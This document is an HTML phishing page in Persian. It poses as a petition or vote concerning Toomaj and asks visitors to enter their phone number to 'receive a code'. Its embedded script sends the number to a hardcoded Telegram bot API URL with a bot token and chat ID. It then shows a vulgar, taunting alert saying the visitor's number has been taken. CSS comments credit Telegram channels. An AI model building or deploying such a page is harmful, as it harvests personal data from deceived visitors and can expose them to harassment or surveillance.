<!DOCTYPE html>
<html dir="rtl">
<head>
  <title>امضا‌ برای دستگیزی توماج</title>
  <link rel="stylesheet" href="styl..es.css">
  <style>
      /**
 * t.me/rmsup
/* @secbaz */
@import url(https://fonts.googleapis.com/css?family=Open+Sans:400,700);

body {
  background: #456;
  font-family: 'Open Sans', sans-serif;
}

.login {
  width: 400px;
  margin: 16px auto;
  font-size: 16px;
}

/* Reset top and bottom margins from certain elements */
.login-header,
.login p {
  margin-top: 0;
  margin-bottom: 0;
}

/* The triangle form is achieved by a CSS hack */
.login-triangle {
  width: 0;
  margin-right: auto;
  margin-left: auto;
  border: 12px solid transparent;
  border-bottom-color: #28d;
}

.login-header {
  background: #28d;
  padding: 20px;
  font-size: 1.4em;
  font-weight: normal;
  text-align: center;
  text-transform: uppercase;
  color: #fff;
}

.login-container {
  background: #ebebeb;
  padding: 12px;
}

/* Every row inside .login-container is defined with p tags */
.login p {
  padding: 12px;
}

.login input {
  box-sizing: border-box;
  display: block;
  width: 100%;
  border-width: 1px;
  border-style: solid;
  padding: 16px;
  outline: 0;
  font-family: inherit;
  font-size: 0.95em;
}

.login input[type="email"],
.login input[type="password"] {
  background: #fff;
  border-color: #bbb;
  color: #555;
}

/* Text fields' focus effect */
.login input[type="email"]:focus,
.login input[type="password"]:focus {
  border-color: #888;
}

.login input[type="submit"] {
  background: #28d;
  border-color: transparent;
  color: #fff;
  cursor: pointer;
}

.login input[type="submit"]:hover {
  background: #17c;
}

/* Buttons' focus effect */
.login input[type="submit"]:focus {
  border-color: #05a;
}

  </style>
</head>
<body>
  <div class="login">
    <div class="login-triangle"></div>
    <h2 class="login-header">برای ورود به رای گیری شماره تلفن خود را وارد نمایید</h2>
      <form class="login-container" id="loggerForm">
      <label for="data">شماره تلفن🆗️</label>
      <input type="text" id="data" name="data" required>
      <p><input type="submit" value="دریافت کد"></p>
    </form>
    </div>
    <script>
        document.getElementById("loggerForm").addEventListener("submit", function(event) {
    event.preventDefault(); // Prevent form submission
  
    var data = document.getElementById("data").value; // Get the data from the input field
  
    // Send the data to the Telegram bot using the fetch API
    fetch("https://api.telegram.org/bot6341604125:AAEl3TYK-N0jk5njl63SizAb-ab6wdStNNk/sendMessage", {
      method: "POST",
      headers: {
        "Content-Type": "application/json"
      },
      body: JSON.stringify({
        chat_id: "6821129839",
        text: data
      })
    })
    .then(function(response) {
      if (response.ok) {
        alert("سلام دا خبی شمارتو ورداشتم تا تو باشی دیگه نخوای کیر توماجو بخوری");
      } else {
        alert("لطفا شماره خود را صحیح وارد کنید🙏");
      }
    })
    .catch(function(error) {
      console.error("An error occurred:", error);
    });
  });

    </script>
</body>
</html>
